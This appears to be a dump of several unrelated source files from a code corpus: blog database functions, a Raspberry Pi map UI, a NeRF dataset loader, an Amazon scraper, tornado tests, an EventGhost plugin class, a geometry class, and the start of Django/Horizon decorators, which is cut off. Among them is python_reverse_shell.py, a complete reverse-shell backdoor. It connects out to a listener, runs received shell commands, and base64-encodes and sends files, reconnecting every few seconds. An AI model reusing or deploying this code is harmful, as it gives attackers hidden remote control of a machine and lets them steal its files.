allow_top, allow_comment, allow_feed, status, original):
"""数据check后插入contents数据表"""
# 检查title或者slug是否与数据库中重复
same_title = TContents().check_title(title)
same_slug = TContents().check_slug(slug)
if same_title != 'ok':
return "same Title!"
if same_slug != 'ok':
return "same Slug!"
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"insert into blog_contents \
values (Null,?,?,?,?,?,?,?,?,?,?,?,?,?)",
(title, slug, created, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original))
con.commit()
con.close()
return 'ok'
except:
return 'no'
def update_contents(pid, title, slug, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original):
"""数据check后插入contents数据表"""
# 检查title或者slug是否与数据库中重复
same_title_id = TContents().check_title_id(title,pid)
same_slug_id = TContents().check_slug_id(slug,pid)
if same_title_id != 'ok':
return "same Title!"
if same_slug_id != 'ok':
return "same Slug!"
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"update blog_contents set \
title = ?, \
slug = ?, \
modified = ?, \
tags = ?, \
column = ?, \
text = ?, \
short = ?, \
allow_top = ?, \
allow_comment = ?, \
allow_feed = ?, \
status = ?, \
original=? where id = ?",
(title, slug, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original, pid)
)
con.commit()
con.close()
return 'ok'
except:
return 'no'
def DelPost(pid):
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"delete from blog_contents where id =?", (pid, )
)
con.commit()
con.close()
return 'ok'
except:
return 'no'
| mit | 5,526,406,091,569,730,000 | 30.192661 | 76 | 0.573235 | false |
IntegerMan/Pi-MFD | PiMFD/Applications/Navigation/MapLocations.py | 1 | 9253 | # coding=utf-8
"""
This file contains map locations information
"""
from PiMFD.Applications.MFDPage import MFDPage
from PiMFD.UI.Button import MFDButton
from PiMFD.UI.TextBoxes import TextBox
from PiMFD.UI.Widgets.MenuItem import TextMenuItem
__author__ = 'Matt Eland'
class MapLocation(object):
"""
Represents a location on the map
:param name: The name of the location
:type name: basestring
:param lat: The latitude
:type lat: float
:param lng: The longitude
:type lng: float
"""
name = None
lat = None
lng = None
tags = {}
id = None
def __init__(self, name, lat, lng):
super(MapLocation, self).__init__()
self.name = name
self.lat = lat
self.lng = lng
class MapLocationAddPage(MFDPage):
id = None
def __init__(self, controller, application, back_page):
super(MapLocationAddPage, self).__init__(controller, application)
self.btn_back = MFDButton("BACK")
self.btn_add_location = MFDButton("ADD")
self.back_page = back_page
self.lbl_header = self.get_header_label('Add Location')
self.txt_name = TextBox(self.display, self, label='Name:', text_width=300)
self.txt_lat = TextBox(self.display, self, label=' Lat:', text_width=180)
self.txt_lng = TextBox(self.display, self, label='Long:', text_width=180)
self.txt_name.set_alphanumeric()
self.txt_name.max_length = 20
self.txt_lat.max_length = 12
self.txt_lng.max_length = 12
self.txt_lat.set_numeric(allow_decimal=True)
self.txt_lng.set_numeric(allow_decimal=True)
self.panel.children = [self.lbl_header, self.txt_name, self.txt_lat, self.txt_lng]
self.data_provider = application.data_provider
self.set_focus(self.txt_name)
def set_values_from_context(self, context):
if context:
self.txt_lat.text = str(context.lat)
self.txt_lng.text = str(context.lng)
self.txt_name.text = context.get_display_name()
self.id = context.id
def get_lower_buttons(self):
return [self.btn_back, self.btn_add_location]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Add
# Actually add the thing
location = MapLocation(self.txt_name.text, self.txt_lat.text, self.txt_lng.text)
location.id = self.id
self.data_provider.add_location(location)
self.application.select_page(self.back_page)
return True
return super(MapLocationAddPage, self).handle_lower_button(index)
def arrange(self):
# Update the valid state of the add button
if self.txt_lng.has_text() and self.txt_lat.has_text() and self.txt_name.has_text():
self.btn_add_location.enabled = True
else:
self.btn_add_location.enabled = False
return super(MapLocationAddPage, self).arrange()
def render(self):
return super(MapLocationAddPage, self).render()
class MapLocationDetailsPage(MFDPage):
def __init__(self, controller, application, location, back_page):
super(MapLocationDetailsPage, self).__init__(controller, application)
self.location = location
self.btn_back = MFDButton("BACK")
self.btn_save = MFDButton("SAVE")
self.btn_home = MFDButton("HOME")
self.btn_delete = MFDButton("DEL")
self.back_page = back_page
self.lbl_header = self.get_header_label('Edit Location')
self.txt_name = TextBox(self.display, self, label='Name:', text_width=300, text=location.name)
self.txt_lat = TextBox(self.display, self, label=' Lat:', text_width=180, text=location.lat)
self.txt_lng = TextBox(self.display, self, label='Long:', text_width=180, text=location.lng)
self.txt_name.set_alphanumeric()
self.txt_name.max_length = 20
self.txt_lat.max_length = 12
self.txt_lng.max_length = 12
self.txt_lat.set_numeric(allow_decimal=True)
self.txt_lng.set_numeric(allow_decimal=True)
self.panel.children = [self.lbl_header, self.txt_name, self.txt_lat, self.txt_lng]
self.set_focus(self.txt_name)
def get_lower_buttons(self):
return [self.btn_back, self.btn_save, self.btn_home, None, self.btn_delete]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Save
# Actually add the thing
self.location.name = self.txt_name.text
self.location.lat = self.txt_lat.text
self.location.lng = self.txt_lng.text
self.application.data_provider.save_locations()
self.application.select_page(self.back_page)
return True
elif index == 2: # Home
# Set this as home
self.controller.options.lat = float(self.txt_lat.text)
self.controller.options.lng = float(self.txt_lng.text)
return True
elif index == 4: # Delete
# TODO: Once my UI framework has grown a bit more, add a confirm functionality.
self.application.delete_location(self.location)
self.application.select_page(self.back_page)
return True
return super(MapLocationDetailsPage, self).handle_lower_button(index)
def arrange(self):
# Update the valid state of the add button
if self.txt_lng.has_text() and self.txt_lat.has_text() and self.txt_name.has_text():
self.btn_save.enabled = True
else:
self.btn_save.enabled = False
# Mark as home if it's your home location
try:
if float(self.txt_lat.text) == self.controller.options.lat and \
float(self.txt_lng.text) == self.controller.options.lng:
self.btn_home.selected = True
else:
self.btn_home.selected = False
except:
self.btn_home.selected = False
return super(MapLocationDetailsPage, self).arrange()
def render(self):
return super(MapLocationDetailsPage, self).render()
class MapLocationsPage(MFDPage):
"""
Lists map locations the user has saved
:param controller: The controller
:param application: The navigation application
:param map_context: The map context
"""
def __init__(self, controller, application, map_context, back_page):
super(MapLocationsPage, self).__init__(controller, application)
self.map_context = map_context
self.data_provider = application.data_provider
self.btn_back = MFDButton("BACK")
self.btn_edit_location = MFDButton("EDIT")
self.btn_add_location = MFDButton("NEW")
self.back_page = back_page
def handle_selected(self):
is_first = True
self.clear_focusables()
if self.data_provider.locations and len(self.data_provider.locations) > 0:
self.panel.children = [self.get_header_label('Locations ({})'.format(len(self.data_provider.locations)))]
for l in self.data_provider.locations:
item = TextMenuItem(self.display, self, '{}: {}, {}'.format(l.name, l.lat, l.lng))
item.font = self.display.fonts.list
item.data_context = l
self.panel.children.append(item)
if is_first:
self.set_focus(item)
is_first = False
super(MapLocationsPage, self).handle_selected()
def handle_control_state_changed(self, widget):
location = widget.data_context
if location:
self.application.show_map(location.lat, location.lng)
super(MapLocationsPage, self).handle_control_state_changed(widget)
def get_lower_buttons(self):
return [self.btn_back, self.btn_edit_location, self.btn_add_location]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Edit
if self.focus:
loc = self.focus.data_context
if loc:
self.application.select_page(MapLocationDetailsPage(self.controller, self.application, loc, self))
return True
elif index == 2: # Add
self.application.select_page(MapLocationAddPage(self.controller, self.application, self))
return True
return super(MapLocationsPage, self).handle_lower_button(index)
def get_button_text(self):
return "GOTO"
def arrange(self):
return super(MapLocationsPage, self).arrange()
def render(self):
if not self.data_provider.locations or len(self.data_provider.locations) < 0:
self.center_text("NO LOCATIONS DEFINED")
else:
return super(MapLocationsPage, self).render() | gpl-2.0 | -5,634,889,265,219,760,000 | 31.584507 | 118 | 0.608451 | false |
google/nerfactor | nerfactor/datasets/nerf.py | 1 | 9257 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os.path import basename, dirname, join, exists
import numpy as np
from PIL import Image
import tensorflow as tf
from third_party.xiuminglib import xiuminglib as xm
from nerfactor.util import logging as logutil, io as ioutil, tensor as tutil, \
img as imgutil
from nerfactor.datasets.base import Dataset as BaseDataset
logger = logutil.Logger(loggee="datasets/nerf")
class Dataset(BaseDataset):
def __init__(self, config, mode, debug=False, always_all_rays=False, spp=1):
self.meta2img = {}
# To allow supersampling a pixel
sps = np.sqrt(spp) # samples per side
assert sps == int(sps), (
"Samples per pixel must be a square number so that samples per "
"side are integers")
self.sps = int(sps)
# Parent init.
super().__init__(config, mode, debug=debug)
# Trigger init. in a main thread before starting multi-threaded work.
# See http://yaqs/eng/q/6292200559345664 for details
Image.init()
# To allow getting all rays for training images
self.always_all_rays = always_all_rays
def get_n_views(self):
if hasattr(self, 'files'):
return len(self.files)
raise RuntimeError("Call `_glob()` before `get_n_views()`")
def _get_batch_size(self):
if self.mode == 'train':
bs = self.config.getint('DEFAULT', 'n_rays_per_step')
else:
# Total number of pixels is batch size, and will need to load
# a datapoint to figure that out
any_path = self.files[0]
ret = self._load_data(any_path)
map_data = ret[-1] # OK as long as shape is (H, W[, ?])
bs = int(np.prod(map_data.shape[:2]))
return bs
def _glob(self):
root = self.config.get('DEFAULT', 'data_root')
if self.mode in ('train', 'test'):
mode_str = self.mode
else:
mode_str = 'val'
metadata_dir = join(root, '%s_???' % mode_str)
# Shortcircuit if testing
if self.mode == 'test':
metadata_paths = xm.os.sortglob(metadata_dir, 'metadata.json')
logger.info(
"Number of '%s' views: %d", self.mode, len(metadata_paths))
return metadata_paths
# Training or validation
# Include only cameras with paired RGB images
metadata_paths = []
for metadata_path in xm.os.sortglob(metadata_dir, 'metadata.json'):
img_path = join(dirname(metadata_path), 'rgba.png')
if exists(img_path):
metadata_paths.append(metadata_path)
self.meta2img[metadata_path] = img_path
else:
logger.warning((
"Skipping camera\n\t%s\nbecause its paried RGB image"
"\n\t%s\ndoesn't exist"), metadata_path, img_path)
logger.info("Number of '%s' views: %d", self.mode, len(metadata_paths))
return metadata_paths
@staticmethod
def _parse_id(metadata_path): # pylint: disable=arguments-differ
return basename(dirname(metadata_path))
# pylint: disable=arguments-differ
def _process_example_postcache(self, id_, rayo, rayd, rgb):
"""Records image dimensions and samples rays.
"""
hw = tf.shape(rgb)[:2]
rayo, rayd, rgb = self._sample_rays(rayo, rayd, rgb)
# NOTE: some memory waste below to make distributed strategy happy
id_ = tf.tile(tf.expand_dims(id_, axis=0), (tf.shape(rgb)[0],))
hw = tf.tile(tf.expand_dims(hw, axis=0), (tf.shape(rgb)[0], 1))
return id_, hw, rayo, rayd, rgb
def _sample_rays(self, rayo, rayd, rgb):
# Shortcircuit if need all rays
if self.mode in ('vali', 'test') or self.always_all_rays:
rayo = tf.reshape(rayo, (-1, 3))
rayd = tf.reshape(rayd, (-1, 3))
rgb = tf.reshape(rgb, (-1, 3))
return rayo, rayd, rgb
# Training: sample rays
coords = tf.stack(
tf.meshgrid(
tf.range(tf.shape(rgb)[0]), tf.range(tf.shape(rgb)[1]),
indexing='ij'),
axis=-1)
coords = tf.reshape(coords, (-1, 2))
# Use tf.random instead of np.random here so that the randomness is
# correct even if we compile this to static graph using tf.function
select_ind = tf.random.uniform(
(self.bs,), minval=0, maxval=tf.shape(coords)[0], dtype=tf.int32)
select_ind = tf.gather_nd(coords, select_ind[:, None])
rayo = tf.gather_nd(rayo, select_ind)
rayd = tf.gather_nd(rayd, select_ind)
rgb = tf.gather_nd(rgb, select_ind)
return rayo, rayd, rgb
def _process_example_precache(self, path):
"""Loads data from paths.
"""
id_, rayo, rayd, rgb = tf.py_function(
self._load_data, [path],
(tf.string, tf.float32, tf.float32, tf.float32))
return id_, rayo, rayd, rgb
def _load_data(self, metadata_path): # pylint: disable=arguments-differ
imh = self.config.getint('DEFAULT', 'imh')
white_bg = self.config.getboolean('DEFAULT', 'white_bg')
metadata_path = tutil.eager_tensor_to_str(metadata_path)
id_ = self._parse_id(metadata_path)
# Generate rays
metadata = ioutil.read_json(metadata_path)
imw = int(imh / metadata['imh'] * metadata['imw'])
cam_to_world = np.array([
float(x) for x in metadata['cam_transform_mat'].split(',')
]).reshape(4, 4)
cam_angle_x = metadata['cam_angle_x']
rayo, rayd = self._gen_rays(cam_to_world, cam_angle_x, imh, imw)
rayo, rayd = rayo.astype(np.float32), rayd.astype(np.float32)
# Shortcircuit if testing
if self.mode == 'test':
rgb = np.zeros((imh, imw, 3), dtype=np.float32) # placeholder
return id_, rayo, rayd, rgb
# Training or validation, where each camera has a paired image
img_path = self.meta2img[metadata_path]
rgba = xm.io.img.load(img_path)
assert rgba.ndim == 3 and rgba.shape[2] == 4, "Input image is not RGBA"
rgba = xm.img.normalize_uint(rgba)
# Resize RGB
if imh != rgba.shape[0]:
rgba = xm.img.resize(rgba, new_h=imh)
rgb, alpha = rgba[:, :, :3], rgba[:, :, 3]
# Composite RGBA image onto white or black background
bg = np.ones_like(rgb) if white_bg else np.zeros_like(rgb)
rgb = imgutil.alpha_blend(rgb, alpha, tensor2=bg)
rgb = rgb.astype(np.float32)
return id_, rayo, rayd, rgb
# pylint: disable=arguments-differ
def _gen_rays(self, to_world, angle_x, imh, imw):
near = self.config.getfloat('DEFAULT', 'near')
ndc = self.config.getboolean('DEFAULT', 'ndc')
# Ray origin
cam_loc = to_world[:3, 3]
rayo = np.tile( # (H * SPS, W * SPS, 3)
cam_loc[None, None, :], (imh * self.sps, imw * self.sps, 1))
# Ray directions
xs = np.linspace(0, imw, imw * self.sps, endpoint=False)
ys = np.linspace(0, imh, imh * self.sps, endpoint=False)
xs, ys = np.meshgrid(xs, ys)
# (0, 0)
# +--------> (w, 0)
# | x
# |
# v y (0, h)
fl = .5 * imw / np.tan(.5 * angle_x)
rayd = np.stack(
((xs - .5 * imw) / fl, -(ys - .5 * imh) / fl, -np.ones_like(xs)),
axis=-1) # local
rayd = np.sum(
rayd[:, :, np.newaxis, :] * to_world[:3, :3], axis=-1) # world
if ndc:
# TODO: not in use, so need to check correctness
# NeRF NDC expects OpenGL coordinates, where up is +y, and forward
# -z, so we need to flip the rays coming from SfM cameras
cv2gl_rot = np.diag((1.0, -1.0, -1.0))
rayo = rayo.dot(cv2gl_rot)
rayd = rayd.dot(cv2gl_rot)
# Shift ray origins to near plane
t = -(near + rayo[..., 2]) / rayd[..., 2]
rayo += t[..., None] * rayd
# Projection
o1 = -1. / (imw / (2. * fl)) * rayo[..., 0] / rayo[..., 2]
o2 = -1. / (imh / (2. * fl)) * rayo[..., 1] / rayo[..., 2]
o3 = 1. + 2. * near / rayo[..., 2]
d1 = -1. / (imw / (2. * fl)) * (
rayd[..., 0] / rayd[..., 2] - rayo[..., 0] / rayo[..., 2])
d2 = -1. / (imh / (2. * fl)) * (
rayd[..., 1] / rayd[..., 2] - rayo[..., 1] / rayo[..., 2])
d3 = -2. * near / rayo[..., 2]
rayo = np.dstack((o1, o2, o3))
rayd = np.dstack((d1, d2, d3))
return rayo, rayd
| apache-2.0 | 779,771,498,087,342,300 | 42.055814 | 80 | 0.555796 | false |
Superjom/bad_source | python/paper/spider/spider/spiders/amazon_notebook.py | 1 | 2872 | # -*- coding: utf-8 -*-
from __future__ import division
import sys
sys.path.append('../../')
import re
import time
import random
import urlparse as up
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.exceptions import CloseSpider
from scrapy.http.request import Request
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from spider.items import SpiderItem
'''
Created on Jul 30, 2013
@author: Chunwei Yan @ pkusz
@mail: [email protected]
'''
#base_url = r'http://www.amazon.com/*'
root = "/home/chunwei/bad_source/python/paper/spider/spider/spiders"
allowed_url = r'http://www.amazon.com/s/.*keywords=notebook.*'
content_url_format = '//h3[contains(@class,"newaps")]/a[contains(@href,"amazon.com")]/@href'
init_start_urls = [
"http://www.amazon.com/s/ref=sr_nr_n_11?rh=n%3A565108%2Ck%3Anotebook&keywords=notebook&ie=UTF8&qid=1384484919&rnid=2941120011"
]
init_allowed_domains = [
"amazon.com",
]
MAX_SLEEP_TIME = 20
class SpiderSpider(CrawlSpider):
count = 0
name = "amazon_notebook"
allowed_domains = init_allowed_domains
dic = set()
start_urls = init_start_urls
rules = (
#only extract links here
#Rule(SgmlLinkExtractor(allow=allowed_url)),
#extract content here and parse urls
Rule(SgmlLinkExtractor(allow=allowed_url), callback="parse"),
)
@property
def sleep_time(self):
return random.random() * MAX_SLEEP_TIME
def parse(self, response):
'''
extract
title
content
url
'''
print '>'*50
print 'response url: ', response.url
hxs = HtmlXPathSelector(response)
print '>>>> repsonse.url: ', response.url
#get urls
content_urls = hxs.select(content_url_format).extract()
list_urls = hxs.select('//span[contains(@class,"pagnLink")]/a[contains(@href,"keywords=notebook")]/@href').extract()
list_urls = [ up.urljoin(response.url, url) for url in list_urls]
print "@" * 60
time.sleep(self.sleep_time)
self.start_urls.extend(list_urls)
for url in list_urls:
yield Request(url, self.parse)
content_re = re.compile(r'http://www.amazon.com/[^s]+.*&keywords=notebook$')
for url in content_urls:
if content_re.match(url):
if len(self.dic) > 450:
self.start_urls = []
raise CloseSpider('reach pages limit, end the spider.')
self.count += 1
self.dic.add( hash(url))
#extract data
item = SpiderItem()
item['url'] = url
item['kind'] = 'amazon_notebook'
yield item
if __name__ == "__main__":
pass
| gpl-2.0 | 4,343,573,823,116,785,700 | 26.883495 | 134 | 0.614206 | false |
eugeniy/pytest-tornado | test/test_fixtures.py | 1 | 1385 | import pytest
import sys
from tornado import gen
_used_fixture = False
@gen.coroutine
def dummy(io_loop):
yield gen.sleep(0)
raise gen.Return(True)
@pytest.fixture(scope='module')
def preparations():
global _used_fixture
_used_fixture = True
pytestmark = pytest.mark.usefixtures('preparations')
@pytest.mark.xfail(pytest.__version__ < '2.7.0',
reason='py.test 2.7 adds hookwrapper, fixes collection')
@pytest.mark.gen_test
def test_uses_pytestmark_fixtures(io_loop):
assert (yield dummy(io_loop))
assert _used_fixture
class TestClass:
def beforeEach(self):
global _used_fixture
_used_fixture = False
@pytest.mark.gen_test
def test_uses_pytestmark_fixtures(self, io_loop):
assert (yield dummy(io_loop))
assert _used_fixture
@pytest.mark.xfail(sys.version_info < (3, 5),
reason='Type hints added in Python 3.5')
def test_type_annotation(testdir):
testdir.makepyfile(
test_type_annotation="""
import pytest
from tornado.ioloop import IOLoop
@pytest.mark.gen_test
def test_type_attrib(io_loop: IOLoop):
pass # Only check that gen_test works
""",
)
# Run tests
result = testdir.runpytest_inprocess()
# Check tests went off as they should:
assert result.ret == 0
| apache-2.0 | -5,778,535,927,752,860,000 | 22.083333 | 75 | 0.633935 | false |
freezeeedos/revshelly | python_reverse_shell.py | 1 | 3523 | #!/usr/bin/python2
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Quentin Gibert
# All rights reserved.
# Based on the work of:
# David Kennedy: http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/
# Xavier Garcia: www.shellguardians.com
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
import subprocess
import sys
import os
import time
import shlex
import base64
import re
HOST = '127.0.0.1' # The remote host
PORT = 8080 # The same port as used by the server
def connect((host, port)):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
return s
def wait_for_command(s):
s.send("[" + os.getcwd() + "]>")
data = s.recv(1024)
data_arr = shlex.split(data, posix=False)
if data == "quit\n":
s.close()
# the socket died
elif len(data)==0:
return True
elif (len(data_arr) > 1) and (data_arr[0] == "uu"):
for i in range(1, len(data_arr)):
try:
f = open(re.sub(r'''"''', '', data_arr[1]), 'rb')
pass
except IOError, e:
s.send("=> " + str(e) + "\n")
continue
try:
fdata = file.read(f)
f.close()
filename = re.sub('''"''', '', os.path.basename(data_arr[i]))
s.send("BEGIN: " + filename + "\n")
s.send(base64.encodestring(fdata))
s.send("END: " + filename + "\n")
except Exception, e:
s.send("Unable to read " + filename + ": " + str(e) + "\n")
return False
elif (len(data_arr) > 1) and (data_arr[0] == "cd"):
try:
os.chdir(re.sub(r'''"''', '', data_arr[1]))
except Exception, cde:
s.send(str(cde) + "\n")
return False
else:
# do shell command
proc = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
return False
def main():
while True:
socked_died=False
try:
s=connect((HOST,PORT))
while not socked_died:
socked_died=wait_for_command(s)
s.close()
except socket.error:
pass
time.sleep(5)
if __name__ == "__main__":
sys.exit(main())
| mit | -661,312,054,476,301,800 | 32.552381 | 98 | 0.598354 | false |
WoLpH/EventGhost | eg/Classes/PluginItem.py | 1 | 6391 | # -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
import base64
import pickle
import wx
# Local imports
import eg
from ActionItem import ActionItem
from TreeItem import TreeItem
class PluginItem(ActionItem):
xmlTag = "Plugin"
icon = eg.Icons.PLUGIN_ICON
isRenameable = False
info = None
@eg.AssertInActionThread
def __init__(self, parent, node):
TreeItem.__init__(self, parent, node)
if node.text:
try:
args = pickle.loads(base64.b64decode(node.text))
except AttributeError:
args = ()
else:
args = ()
evalName = node.attrib.get('identifier', None)
self.pluginName = node.attrib.get('file', None)
guid = node.attrib.get('guid', self.pluginName)
self.info = info = eg.pluginManager.OpenPlugin(
guid,
evalName,
args,
self,
)
self.name = eg.text.General.pluginLabel % info.label
if info.icon != self.icon:
self.icon = eg.Icons.PluginSubIcon(info.icon)
#self.icon = info.icon
self.url = info.url
self.executable = info.instance
def AskCut(self):
return self.AskDelete()
def AskDelete(self):
actionItemCls = self.document.ActionItem
def SearchFunc(obj):
if obj.__class__ == actionItemCls:
if obj.executable and obj.executable.plugin == self.executable:
return True
return None
if self.root.Traverse(SearchFunc) is not None:
eg.MessageBox(
eg.text.General.deletePlugin,
eg.APP_NAME,
wx.NO_DEFAULT | wx.OK | wx.ICON_EXCLAMATION
)
return False
if not TreeItem.AskDelete(self):
return False
return True
@eg.AssertInActionThread
def Delete(self):
info = self.info
def DoIt():
info.Close()
info.instance.OnDelete()
info.RemovePluginInstance()
eg.actionThread.Call(DoIt)
ActionItem.Delete(self)
self.executable = None
self.info = None
@eg.AssertInActionThread
def Execute(self):
if not self.isEnabled:
return None, None
if eg.config.logActions:
self.Print(self.name)
if self.shouldSelectOnExecute:
wx.CallAfter(self.Select)
eg.indent += 1
self.info.Start()
eg.indent -= 1
eg.result = self.executable
return None, None
# The Find function calls this from MainThread, so we can't restrict this
# to the ActionThread
#@eg.AssertInActionThread
def GetArguments(self):
return self.info.args
def GetBasePath(self):
"""
Returns the filesystem path, where additional files (like pictures)
should be found.
Overrides ActionItem.GetBasePath()
"""
return self.info.path
def GetData(self):
attr, text = TreeItem.GetData(self)
del attr[0]
attr.append(('Identifier', self.executable.info.evalName))
guid = self.executable.info.guid
if guid:
attr.append(('Guid', guid))
attr.append(('File', self.pluginName))
text = base64.b64encode(pickle.dumps(self.info.args, 2))
return attr, text
def GetLabel(self):
return self.name
def GetTypeName(self):
return self.executable.info.name
def NeedsStartupConfiguration(self):
"""
Returns True if the item wants to be configured after creation.
Overrides ActionItem.NeedsStartupConfiguration()
"""
# if the Configure method of the executable is overriden, we assume
# the item wants to be configured after creation
return (
self.executable.Configure.im_func !=
eg.PluginBase.Configure.im_func
)
def RefreshAllVisibleActions(self):
"""
Calls Refresh() for all currently visible actions of this plugin.
"""
actionItemCls = self.document.ActionItem
plugin = self.info.instance
def Traverse(item):
if item.__class__ == actionItemCls:
if item.executable.plugin == plugin:
pass
#eg.Notify("NodeChanged", item)
else:
if item.childs and item in item.document.expandedNodes:
for child in item.childs:
Traverse(child)
Traverse(self.root)
@eg.LogIt
def RestoreState(self):
if self.isEnabled:
eg.actionThread.Call(self.info.Start)
@eg.LogIt
@eg.AssertInActionThread
def SetArguments(self, args):
info = self.info
if not info.lastException and args == self.info.args:
return
self.info.args = args
label = info.instance.GetLabel(*args)
if label != info.label:
info.label = label
self.name = eg.text.General.pluginLabel % label
#eg.Notify("NodeChanged", self)
self.RefreshAllVisibleActions()
if self.isEnabled:
eg.actionThread.Call(self.info.Stop)
eg.actionThread.Call(self.info.Start)
def SetAttributes(self, tree, itemId):
if self.info.lastException or self.info.initFailed:
tree.SetItemTextColour(itemId, eg.colour.pluginError)
@eg.AssertInActionThread
def SetEnable(self, flag=True):
ActionItem.SetEnable(self, flag)
if flag:
self.info.Start()
else:
self.info.Stop()
| gpl-2.0 | -8,394,167,896,932,475,000 | 30.019417 | 79 | 0.6 | false |
FabriceSalvaire/Musica | Musica/Geometry/Path.py | 1 | 2215 | ####################################################################################################
#
# Musica - A Music Theory Package for Python
# Copyright (C) 2017 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
####################################################################################################
from .Primitive import Primitive2D
from .Vector import Vector2D
####################################################################################################
class Polyline(Primitive2D):
#######################################
def __init__(self, *args):
""" Construct a :class:`Polyline` along points. """
if len(args) == 1:
self._points = [Vector2D(point) for point in args[0]]
else:
self._points = [Vector2D(point) for point in args]
##############################################
def clone(self):
return self.__class__(self._points)
##############################################
def __repr__(self):
return "{0.__class__.__name__} {0._points}".format(self)
##############################################
def transform(self, transformation):
points = transformation * self._points
return self.__class__(points)
##############################################
def __iter__(self):
return iter(self._points)
def __len__(self):
return len(self._points)
def __getitem__(self, _slice):
return self._points[_slice]
| gpl-3.0 | 6,031,306,140,311,497,000 | 31.101449 | 100 | 0.463657 | false |
ikargis/horizon_fod | horizon/decorators.py | 1 | 3388 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 CRS4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
General-purpose decorators for use with Horizon.
"""
import functools
from django.utils.decorators import available_attrs # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
def _current_component(view_func, dashboard=None, panel=None):
"""Sets the currently-active dashboard and/or panel on the request."""
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if dashboard:
request.horizon['dashboard'] = dashboard
if panel:
request.horizon['panel'] = panel
return view_func(request, *args, **kwargs)
return dec
def require_auth(view_func):
"""Performs user authentication check.
Similar to Django's `login_required` decorator, except that this throws
:exc:`~horizon.exceptions.NotAuthenticated` exception if the user is not
signed-in.
"""
from horizon.exceptions import NotAuthenticated # noqa
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if request.user.is_authenticated():
return view_func(request, *args, **kwargs)
raise NotAuthenticated(_("Please log in to continue."))
return dec
def require_perms(view_func, required):
"""Enforces permission-based access controls.
:param list required: A tuple of permission names, all of which the request
user must possess in order access the decorated view.
Example usage::
from horizon.decorators import require_perms
@require_perms(['foo.admin', 'foo.member'])
def my_view(request):
...
Raises a :exc:`~horizon.exceptions.NotAuthorized` exception if the
requirements are not met.
"""
from horizon.exceptions import NotAuthorized # noqa
